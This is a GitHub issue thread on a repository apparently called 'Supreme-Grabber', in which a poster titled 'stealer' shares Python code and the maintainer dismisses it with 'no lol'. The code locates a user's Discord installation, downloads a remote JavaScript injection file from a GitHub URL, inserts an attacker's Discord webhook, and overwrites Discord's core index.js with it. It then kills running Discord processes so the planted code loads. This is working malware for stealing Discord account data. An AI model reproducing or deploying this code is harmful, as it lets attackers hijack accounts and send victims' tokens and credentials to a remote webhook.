### ISSUE TITLE
stealer

### ISSUE THREAD

**Issue by 0xbitx** [real-fbdn/Supreme-Grabber#9]
import os
LOCAL_APP_DATA = Path(os.getenv('localappdata'))

def inject_discord():
    for _dir in os.listdir(LOCAL_APP_DATA):
        if 'discord' in _dir.lower():
            for __dir in os.listdir(LOCAL_APP_DATA / _dir):
                if re.match(r'app-(\d*\.\d*)*', __dir):
                    abspath = LOCAL_APP_DATA / _dir / __dir
                    f = requests.get("https://raw.githubusercontent.com/lnfernal/Discord-Injection/main/Injection-clean.js").text.replace("%https://discord.com/api/webhooks/1137689025025679501/i-eNJb_D_TEQHHktxetcTCAp5rBx8QOw9htf3_vxbSP-jwesHJ2XcuP54fkK8J-EGy3i%", webhook)
                    try:
                        index_file_path = abspath / 'modules' / 'discord_desktop_core-1' / 'discord_desktop_core' / 'index.js'
                        with open(index_file_path, 'w', encoding="utf-8") as index_file:
                            index_file.write(f)
                    except:
                        try:
                            index_file_path = abspath / 'modules' / 'discord_desktop_core-2' / 'discord_desktop_core' / 'index.js'
                            with open(index_file_path, 'w', encoding="utf-8") as index_file:
                                index_file.write(f)
                        except:
                            try:
                                index_file_path = abspath / 'modules' / 'discord_desktop_core-3' / 'discord_desktop_core' / 'index.js'
                                with open(index_file_path, 'w', encoding="utf-8") as index_file:
                                    index_file.write(f)
                            except:
                                pass

def kill_discord():
    for proc in psutil.process_iter():
        if proc.name() == "Discord.exe":
            proc.kill()

**Comment by real-fbdn** [comment]
![image](https://github.com/real-fbdn/Supreme-Grabber/assets/142435308/160dbad4-519e-4da2-aeee-a853f8ef0b23)
no lol
